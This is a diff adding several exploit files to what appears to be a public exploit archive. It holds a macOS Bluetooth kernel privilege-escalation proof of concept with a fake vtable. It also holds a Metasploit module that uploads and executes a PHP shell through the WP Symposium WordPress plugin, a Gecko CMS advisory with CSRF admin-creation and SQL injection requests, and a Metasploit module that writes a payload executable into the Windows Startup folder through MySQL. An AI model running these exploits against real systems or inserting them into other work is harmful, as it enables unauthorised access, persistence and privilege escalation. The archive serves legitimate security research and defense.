+ + /* Connect to vuln service */ + io_connect_t port = (io_connect_t) 0; + kern_return_t kr = IOServiceOpen(service, mach_task_self(), 0, &port); + IOObjectRelease(service); + if (kr != kIOReturnSuccess) { + return kr; + } + + printf(" [+] Opened connection to service on port: %d\n", port); + + struct BluetoothCall a; + + memset(&a, 0, sizeof(a)); + + a.sizes[0] = 0x1000; + a.args[0] = (uint64_t) calloc(a.sizes[0], sizeof(char)); + + a.sizes[1] = 0x1000; + a.args[1] = (uint64_t) calloc(a.sizes[1], sizeof(char)); + memset((void *)a.args[1], 0x22, 0x1000); + + + /* Call DispatchHCISendRawACLData() */ + a.index = 0x63; + + /* Debug */ + for(int i = 0; i < 120; i++) { + if(i % 8 == 0) printf("\n"); + printf("\\x%02x", ((unsigned char *)&a)[i]); + } + printf("\n"); + fflush(stdout); + + kr = IOConnectCallMethod((mach_port_t) port, /* Connection */ + (uint32_t) 0, /* Selector */ + NULL, 0, /* input, inputCnt */ + (const void*) &a, /* inputStruct */ + sizeof(a), /* inputStructCnt */ + NULL, NULL, NULL, NULL); /* Output stuff */ + printf("kr: %08x\n", kr); + + return IOServiceClose(port); +} diff --git a/platforms/osx/dos/35774.c b/platforms/osx/dos/35774.c new file mode 100755 index 000000000..30c515a01 --- /dev/null +++ b/platforms/osx/dos/35774.c @@ -0,0 +1,141 @@ +/* + * lpe-issue1.c + * Written for Mac OS X Yosemite (10.10.1) by @joystick and @rpaleari. + * + * Exploits IOBluetoothHCIUserClient::DispatchHCIWriteStoredLinkKey() + * + * gcc -Wall -o lpe-issue1{,.c} -framework IOKit + * + */ + +#include +#include +#include +#include +#include + +#include + +#define SIZE 0x1000 + +struct BluetoothCall { + uint64_t args[7]; + uint64_t sizes[7]; + uint64_t index; +}; + +#ifndef bswap64 +# define bswap64(num) \ + ( (((uint64_t)(num) << 56) ) \ + | (((uint64_t)(num) << 40) & UINT64_C(0x00FF000000000000)) \ + | (((uint64_t)(num) << 24) & UINT64_C(0x0000FF0000000000)) \ + | (((uint64_t)(num) << 8) & UINT64_C(0x000000FF00000000)) \ + | (((uint64_t)(num) >> 8) & UINT64_C(0x00000000FF000000)) \ + | (((uint64_t)(num) >> 24) & UINT64_C(0x0000000000FF0000)) \ + | (((uint64_t)(num) >> 40) & UINT64_C(0x000000000000FF00)) \ + | (((uint64_t)(num) >> 56) ) ) +#endif + +void create_requests(io_connect_t port) +{ + struct BluetoothCall a; + uint32_t i; + kern_return_t kr; + + for (i = 0; i < 7; i++) { + a.args[i] = (uint64_t) calloc(SIZE, sizeof(char)); + a.sizes[i] = SIZE; + } + + /* DispatchHCIRequestCreate() */ + a.index = 0x0; + + *(uint64_t *)a.args[0] = 5*1000; /* Timeout */ + memset((void *)a.args[1], 0x81, 0x1000); + memset((void *)a.args[2], 0x82, 0x1000); + memset((void *)a.args[3], 0x83, 0x1000); + memset((void *)a.args[4], 0x84, 0x1000); + memset((void *)a.args[5], 0x85, 0x1000); + memset((void *)a.args[6], 0x86, 0x1000); + + for(i = 0; i < 500; i++) { + kr = IOConnectCallMethod((mach_port_t) port, /* Connection */ + (uint32_t) 0, /* Selector */ + NULL, 0, /* input, inputCnt */ + (const void*) &a, /* inputStruct */ + 120, /* inputStructCnt */ + NULL, NULL, NULL, NULL); /* Output stuff */ + + if(kr == 0xe00002bd) /* Full */ + break; + } +} + +int main(void) { + struct BluetoothCall a; + int i; + void *landing_page = calloc(SIZE, sizeof(char)); + + /* Init a */ + for (i = 0; i < 7; i++) { + a.args[i] = (uint64_t) calloc(SIZE, sizeof(char)); + a.sizes[i] = SIZE; + } + + /* Finding vuln service */ + io_service_t service = + IOServiceGetMatchingService(kIOMasterPortDefault, + IOServiceMatching("IOBluetoothHCIController")); + + if (!service) { + return -1; + } + + /* Connect to vuln service */ + io_connect_t port = (io_connect_t) 0; + kern_return_t kr = IOServiceOpen(service, mach_task_self(), 0, &port); + IOObjectRelease(service); + if (kr != kIOReturnSuccess) { + return kr; + } + + /* Populating with fake requests. */ + create_requests(port); + + /* IOBluetoothHCIUserClient::DispatchHCIWriteStoredLinkKey() */ + a.index = 42; + /* Req number */ + *((uint32_t *)a.args[0]) = 1; + /* num_of_keys */ + *((uint32_t *)a.args[1]) = 0x20; + + /* Padding */ + memset((void *)a.args[3], 0x33, 152); + /* mov rdi, [r14+0AB8h] */ + *((uint64_t *)(a.args[3]+152)) = bswap64((uint64_t)landing_page); + /* mov rax, [rdi] */ + *((uint64_t *)((uint64_t)landing_page)) = (uint64_t)landing_page; + /* call [rax+0x1d0]: this will trigger a #GP calling 0x4141414142424242 */ + *((uint64_t *)((uint64_t)landing_page+0x1d0)) = (uint64_t) 0x4141414142424242; + + /* Here some fixing to the vtable is required to return cleanly after the exploit */ + +#if 0 + /* Debug print */ + for(i = 0; i < 120; i++) { + if(i % 8 == 0) printf("\n"); + printf("\\x%02x", ((unsigned char *)&a)[i]); + } + printf("\n"); +#endif + + kr = IOConnectCallMethod((mach_port_t) port, /* Connection */ + (uint32_t) 0, /* Selector */ + NULL, 0, /* input, inputCnt */ + (const void*) &a, /* inputStruct */ + 120, /* inputStructCnt */ + NULL, NULL, NULL, NULL); /* Output stuff */ + printf("kr: %08x\n", kr); + + return IOServiceClose(port); +} diff --git a/platforms/php/remote/35778.rb b/platforms/php/remote/35778.rb new file mode 100755 index 000000000..b4a70c6b9 --- /dev/null +++ b/platforms/php/remote/35778.rb @@ -0,0 +1,99 @@ +## +# This module requires Metasploit: http://www.metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::FileDropper + include Msf::HTTP::Wordpress + + def initialize(info = {}) + super(update_info( + info, + 'Name' => 'WordPress WP Symposium 14.11 Shell Upload', + 'Description' => %q{WP Symposium Plugin for WordPress contains a + flaw that allows a remote attacker to execute + arbitrary PHP code. This flaw exists because the + /wp-symposium/server/file_upload_form.php script + does not properly verify or sanitize + user-uploaded files. By uploading a .php file, + the remote system will place the file in a + user-accessible path. Making a direct request to + the uploaded file will allow the attacker to + execute the script with the privileges of the + web server.}, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Claudio Viviani', # Vulnerability disclosure + 'Rob Carr ' # Metasploit module + ], + 'References' => + [ + ['OSVDB', '116046'], + ['WPVDB', '7716'] + ], + 'DisclosureDate' => 'Dec 11 2014', + 'Platform' => 'php', + 'Arch' => ARCH_PHP, + 'Targets' => [['wp-symposium < 14.12', {}]], + 'DefaultTarget' => 0 + )) + end + + def check + check_plugin_version_from_readme('wp-symposium', '14.12') + end + + def generate_mime_message(payload, payload_name, directory_name, symposium_url) + data = Rex::MIME::Message.new + data.add_part('1', nil, nil, 'form-data; name="uploader_uid"') + data.add_part("./#{directory_name}/", nil, nil, 'form-data; name="uploader_dir"') + data.add_part(symposium_url, nil, nil, 'form-data; name="uploader_url"') + data.add_part(payload.encoded, 'application/x-php', nil, "form-data; name=\"files[]\"; filename=\"#{payload_name}\"") + data + end + + def exploit + print_status("#{peer} - Preparing payload") + unique_name = Rex::Text.rand_text_alpha(10) + payload_name = "#{unique_name}.php" + symposium_url = normalize_uri(wordpress_url_plugins, 'wp-symposium', 'server', 'php') + payload_url = normalize_uri(symposium_url, unique_name, payload_name) + data = generate_mime_message(payload, payload_name, unique_name, symposium_url) + symposium_url = normalize_uri(symposium_url, 'index.php') + + print_status("#{peer} - Uploading payload to #{payload_url}") + res = send_request_cgi( + 'method' => 'POST', + 'uri' => symposium_url, + 'ctype' => "multipart/form-data; boundary=#{data.bound}", + 'data' => data.to_s + ) + + if res && res.code == 200 && res.body.length > 0 && !res.body.include?('error') && res.body != '0' + print_good("#{peer} - Uploaded the payload") + register_files_for_cleanup(payload_name) + + print_status("#{peer} - Executing the payload...") + send_request_cgi( + { + 'uri' => payload_url, + 'method' => 'GET' + }, 5) + print_good("#{peer} - Executed payload") + else + if res.nil? + fail_with(Failure::Unreachable, "No response from the target") + else + vprint_error("#{peer} - HTTP Status: #{res.code}") + vprint_error("#{peer} - Server returned: #{res.body}") + fail_with(Failure::UnexpectedReply, "Failed to upload the payload") + end + end + end +end \ No newline at end of file diff --git a/platforms/php/webapps/35767.txt b/platforms/php/webapps/35767.txt new file mode 100755 index 000000000..0dd7ddf6f --- /dev/null +++ b/platforms/php/webapps/35767.txt @@ -0,0 +1,117 @@ +?Gecko CMS 2.3 Multiple Vulnerabilities + +Vendor: JAKWEB +Product web page: http://www.cmsgecko.com +Affected version: 2.3 and 2.2 + +Summary: Gecko CMS is the way to go, forget complicated, bloated +and slow content management systems, Gecko CMS has been build to +be intuitive, easy to use, extendable to almost anything, running +on all standard web hosting (PHP and one MySQL database, Apache is +a plus), browser compatibility and fast, super fast! + +Desc: Gecko CMS suffers from multiple vulnerabilities including +Cross-Site Request Forgery, Stored and Reflected Cross-Site Scripting +and SQL Injection. + +Tested on: Apache/2 + PHP/5.4.36 + + +Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2015-5222 +Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5222.php + +27.12.2014 +--- + +CSRF Add Admin: +=============== + + +
+ + + + + + + + + +
+ + + +usergroup 4 = moderator + 3 = administrator + 2 = member standard + 1 = guest + 5 = banned + +Stored XSS (params: jak_img, jak_name, jak_url): +================================================ + +POST http://server/admin/index.php?p=categories&sp=newcat HTTP/1.1 + +jak_catparent 0 +jak_catparent2 0 +jak_footer 1 +jak_img "> +jak_lcontent

test

+jak_lcontent2 +jak_menu 1 +jak_name "> +jak_name2 +jak_url "> +jak_varname ZSL +save + +SQL Injection (params: jak_delete_log[], ssp): +============================================== + +POST /admin/index.php?p=logs&sp=s HTTP/1.1 + +delete=&jak_delete_log%5B%5D=4%20and%20benchmark(20000000%2csha1(1))--%20&jak_delete_log%5B%5D=2&jak_delete_log%5B%5D=1 + +-- + +GET /admin/index.php?p=logs&sp=delete&ssp=3[SQLi] HTTP/1.1 + +Reflected XSS: +============== + +/admin/index.php [horder%5B%5D parameter] +/admin/index.php [jak_catid parameter] +/admin/index.php [jak_content parameter] +/admin/index.php [jak_css parameter] +/admin/index.php [jak_delete_log%5B%5D parameter] +/admin/index.php [jak_email parameter] +/admin/index.php [jak_extfile parameter] +/admin/index.php [jak_file parameter] +/admin/index.php [jak_hookshow%5B%5D parameter] +/admin/index.php [jak_img parameter] +/admin/index.php [jak_javascript parameter] +/admin/index.php [jak_lcontent parameter] +/admin/index.php [jak_name parameter] +/admin/index.php [jak_password parameter] +/admin/index.php [jak_showcontact parameter] +/admin/index.php [jak_tags parameter] +/admin/index.php [jak_title parameter] +/admin/index.php [jak_url parameter] +/admin/index.php [jak_username parameter] +/admin/index.php [real_hook_id%5B%5D parameter] +/admin/index.php [sp parameter] +/admin/index.php [sreal_plugin_id%5B%5D parameter] +/admin/index.php [ssp parameter] +/admin/index.php [sssp parameter] +/js/editor/plugins/filemanager/dialog.php [editor parameter] +/js/editor/plugins/filemanager/dialog.php [field_id parameter] +/js/editor/plugins/filemanager/dialog.php [fldr parameter] +/js/editor/plugins/filemanager/dialog.php [lang parameter] +/js/editor/plugins/filemanager/dialog.php [popup parameter] +/js/editor/plugins/filemanager/dialog.php [subfolder parameter] +/js/editor/plugins/filemanager/dialog.php [type parameter] diff --git a/platforms/windows/remote/35777.rb b/platforms/windows/remote/35777.rb new file mode 100755 index 000000000..2cec772fa --- /dev/null +++ b/platforms/windows/remote/35777.rb @@ -0,0 +1,143 @@ +## +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::MYSQL + include Msf::Exploit::EXE + include Msf::Exploit::FileDropper + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Oracle MySQL for Microsoft Windows FILE Privilege Abuse', + 'Description' => %q{ + This module takes advantage of a file privilege misconfiguration problem + specifically against Windows MySQL servers. This module abuses the FILE + privilege to write a payload to Microsoft's All Users Start Up directory + which will execute every time a user logs in. The default All Users Start + Up directory used by the module is Windows 7 friendly. + }, + 'Author' => + [ + 'sinn3r', + 'Sean Verity + { + 'DisablePayloadHandler' => 'true' + }, + 'License' => MSF_LICENSE, + 'References' => + [ + ['CVE', '2012-5613'], #DISPUTED + ['OSVDB', '88118'], + ['EDB', '23083'], + ['URL', 'http://seclists.org/fulldisclosure/2012/Dec/13'] + ], + 'Platform' => 'win', + 'Targets' => + [ + [ 'MySQL on Windows', { } ] + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Dec 01 2012' + )) + + register_options( + [ + OptString.new('USERNAME', [ true, 'The username to authenticate as']), + OptString.new('PASSWORD', [ true, 'The password to authenticate with']), + OptString.new('STARTUP_FOLDER', [ true, 'The All Users Start Up folder', '/programdata/microsoft/windows/start menu/programs/startup/']) + ]) + end + + def check + m = mysql_login(datastore['USERNAME'], datastore['PASSWORD']) + return Exploit::CheckCode::Safe unless m + + return Exploit::CheckCode::Appears if is_windows? + + Exploit::CheckCode::Safe + end + + def peer + "#{rhost}:#{rport}" + end + + def query(q) + rows = [] + + begin + res = mysql_query(q) + return rows unless res + res.each_hash do |row| + rows << row + end + rescue RbMysql::ParseError + return rows + end + + rows + end + + def is_windows? + r = query("SELECT @@version_compile_os;") + r[0]['@@version_compile_os'] =~ /^Win/ ? true : false + end + + def get_drive_letter + r = query("SELECT @@tmpdir;") + drive = r[0]['@@tmpdir'].scan(/^(\w):/).flatten[0] || '' + + drive + end + + def upload_file(bin, dest) + p = bin.unpack("H*")[0] + query("SELECT 0x#{p} into DUMPFILE '#{dest}'") + end + + def exploit + unless datastore['STARTUP_FOLDER'].start_with?('/') && datastore['STARTUP_FOLDER'].end_with?('/') + fail_with(Failure::BadConfig, "STARTUP_FOLDER should start and end with '/' Ex: /programdata/microsoft/windows/start menu/programs/startup/") + end + + print_status("#{peer} - Attempting to login as '#{datastore['USERNAME']}:#{datastore['PASSWORD']}'") + begin + m = mysql_login(datastore['USERNAME'], datastore['PASSWORD']) + rescue RbMysql::AccessDeniedError + fail_with(Failure::NoAccess, "#{peer} - Access denied") + end + + fail_with(Failure::NoAccess, "#{peer} - Unable to Login") unless m + + unless is_windows? + fail_with(Failure::NoTarget, "#{peer} - Remote host isn't Windows") + end + + begin + drive = get_drive_letter + rescue RbMysql::ParseError + fail_with(Failure::UnexpectedReply, "#{peer} - Could not determine drive name") + end + + fail_with(Failure::UnexpectedReply, "#{peer} - Could not determine drive name") unless drive + + exe_name = Rex::Text::rand_text_alpha(5) + ".exe" + dest = "#{drive}:#{datastore['STARTUP_FOLDER']}#{exe_name}" + exe = generate_payload_exe + + print_status("#{peer} - Uploading to '#{dest}'") + begin + upload_file(exe, dest) + rescue RbMysql::AccessDeniedError + fail_with(Failure::NotVulnerable, "#{peer} - No permission to write. I blame kc :-)") + end + register_file_for_cleanup("#{dest}") + end + +end \ No newline at end of file